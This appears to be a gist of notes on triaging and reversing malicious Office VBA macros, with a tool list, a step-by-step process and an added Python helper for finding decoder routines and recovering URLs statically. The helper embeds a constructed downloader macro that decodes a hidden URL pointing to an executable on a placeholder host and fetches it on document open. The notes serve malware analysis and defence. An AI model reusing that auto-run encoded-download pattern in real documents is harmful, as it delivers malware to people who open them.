@adricnet
Last active December 27, 2019 21:01
Some notes on VBA analysis

Some VBA notes

Tools

  • Unix(Remnux): viper.li, oletools, & Didier's tools
  • Windows: Office Excel (VBE) & Visual Studio Community (VSC), officemalscanner
  • Editors: scite, VS Code

Dependencies

  • viper.li for sample management
  • olevba or officemalscanner for triage
  • oledump for analysis extraction

MS Office Visual Basic Editor (VBE)

There's a feature-packed Visual Basic for Applications development environment built into the Office products; Excel is a good choice. Enable the Developer tab in Options, then open the editor from that tab on the ribbon (or press Alt+F11): [Enable Developer Tab on Ribbon (MSDN)](https://msdn.microsoft.com/en-us/library/bb608625.aspx)

VBE has good syntax highlighting, inspection, and debugging. It's great for running isolated bits of code after they are defanged, but it doesn't currently offer a break-on-entry when a document loads, as OllyDbg does on load or as the `debugger;` statement does in browser debuggers. The workaround is to open the document with macros disabled, then set a breakpoint (F9) or insert a `Stop` statement in the routine before running it by hand.

All current versions of Office have this support, including apparently Office 2016 for Mac(!). MS Office is commercial software available via retail, O365 SaaS, and enterprise licensing.

MS Visual Studio Community (VSC)

Visual Studio IDE has full support for developing complex applications in Visual Basic (VB.NET), and this extends to syntax support for VBA. The VSC debugger is full featured and better in every way than the VBE, but it cannot open Office documents directly, and VB.NET is not VBA: extracted macro code usually needs edits (the Office object model calls, `Set` assignments, late-bound `CreateObject` targets) before it will compile there.

The Community edition of VS is now generally available for free use with online registration required, though VS is commercial software.

https://www.visualstudio.com/

VS code

Visual Studio Code is a programmer's editor released free of charge by MS for the major platforms.

Code has native support for Visual Basic (inherited from the VS products) that provides syntax highlighting for VBA. Out of the box it does not parse or compile the code, so treat it as an editor, not a checker.

https://code.visualstudio.com/

$VISUAL

Standard Unix text tools and the usual programming editors are good at the text manipulations useful for code analysis. Remnux ships Scite, vim, and others.

Process Oct 2016

A combination of static and dynamic analysis has been effective against macro malcode samples seen recently:

  1. Triage DOC/RTF for macro presence (viper, olevba, officemalscanner)
  2. Extract the VBA code; minimal static cleanup (oledump, scite)
  3. Isolate the string encode/decode routines and the encoded strings (scite, grep)
  4. Careful execution of the decoding code in Excel against the strings => network indicators (Excel). Do this in an isolated VM with networking off, and run only the decode routine, with any download, Shell, or WScript calls removed.
  5. Further code reversing in VBE or VSC for other features, such as file decryption (scite, Excel)
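Added example, not code from this gist: a Python version of steps 2 through 4 for the common case where the decode routine is small enough to port rather than run in Excel (porting goes beyond step 4 as written, and is the safer option when it is feasible). Everything in it is constructed for illustration: SAMPLE_VBA is a made-up macro in the style of 2016-era downloaders, `Unmask`/`_mask` and the reverse-then-XOR-7-then-hex scheme are assumptions, and `example.invalid` is a reserved name. `triage()` shows steps 1 and 2 through the `VBA_Parser` class in oletools (olevba's library API) and is only needed on real files.

```python
"""Static helpers for steps 2-4 of the process above (added example, not the
gist's code). SAMPLE_VBA, Unmask, _mask and the XOR-7 scheme are assumptions
made for this example, not taken from any real sample."""
import re


def _mask(text: str) -> str:
    """Used only to build the constructed sample: reverse the string, XOR each
    byte with 7, emit as hex pairs (the inverse of the sample's Unmask())."""
    return "".join("%02X" % (ord(c) ^ 7) for c in text[::-1])


# Constructed sample macro (not real malware). The decode routine is typical:
# Mid() walks the literal, CLng("&H..") and Xor rebuild bytes, Chr() turns them
# into characters and StrReverse undoes the reversal.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    Dim payload As String
    payload = Unmask("%s")
    Call Fetch(payload)
End Sub

Private Function Unmask(s As String) As String
    Dim i As Long, out As String
    For i = 1 To Len(s) Step 2
        out = out & Chr(CLng("&H" & Mid(s, i, 2)) Xor 7)
    Next i
    Unmask = StrReverse(out)
End Function
''' % _mask("http://example.invalid/a.exe")

# One routine, from its Sub/Function line to its End line.
ROUTINE_RE = re.compile(
    r"^[ \t]*(?:Private |Public )?(?:Function|Sub)[ \t]+(\w+)\b.*?^[ \t]*End (?:Function|Sub)",
    re.S | re.M,
)
# Builtins that string decoders lean on; two or more distinct ones is a flag.
DECODE_FUNCS = re.compile(r"\b(Chr|ChrW|Asc|AscW|Xor|StrReverse|Mid|Replace|Split)\b", re.I)
# String literals too long to be ordinary text. VBA escapes quotes by doubling
# them, which this deliberately simple pattern ignores.
LITERAL_RE = re.compile(r'"([^"\n]{16,})"')
URL_RE = re.compile(r'''(?:https?|ftp)://[^\s"']+''', re.I)


def find_decoder_routines(vba: str, min_hits: int = 2) -> list:
    """Step 3: names of routines whose bodies use several decode builtins."""
    found = []
    for m in ROUTINE_RE.finditer(vba):
        name, body = m.group(1), m.group(0)
        hits = {h.lower() for h in DECODE_FUNCS.findall(body)}
        if len(hits) >= min_hits:
            found.append(name)
    return found


def find_encoded_literals(vba: str) -> list:
    """Step 3: candidate encoded strings, in order of appearance."""
    return LITERAL_RE.findall(vba)


def unmask(s: str) -> str:
    """Python port of the sample's Unmask(): hex pairs -> bytes XOR 7 -> reversed.
    In the VBA, Xor applies to the CLng() result, so XOR the integer here too."""
    out = "".join(chr(int(s[i:i + 2], 16) ^ 7) for i in range(0, len(s), 2))
    return out[::-1]


def extract_indicators(vba: str, decoder=unmask) -> list:
    """Step 4: run the ported decoder over every candidate literal and keep
    anything that looks like a network indicator."""
    urls = []
    for lit in find_encoded_literals(vba):
        try:
            plain = decoder(lit)
        except ValueError:  # literal was not meant for this decoder (not hex)
            continue
        urls.extend(URL_RE.findall(plain))
    return urls


def triage(path: str) -> list:
    """Steps 1-2 on a real file via oletools' VBA_Parser (olevba's library API):
    returns (vba_filename, code) pairs, or [] when the file has no macros."""
    from oletools.olevba import VBA_Parser  # import here; not needed for the sample
    parser = VBA_Parser(path)
    if not parser.detect_vba_macros():
        return []
    return [(name, code) for _, _, name, code in parser.extract_macros()]


if __name__ == "__main__":
    print("decoder routines:", find_decoder_routines(SAMPLE_VBA))
    print("indicators:", extract_indicators(SAMPLE_VBA))
```

On a real document, feed each code stream from `triage()` to `find_decoder_routines()`, read the flagged routine, and write a port like `unmask()` for it; `extract_indicators()` then recovers the C2 or download URL without any macro ever executing. The thresholds (16-character literals, two distinct builtins) are starting points and will need tuning per sample.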

Tricks

Refs
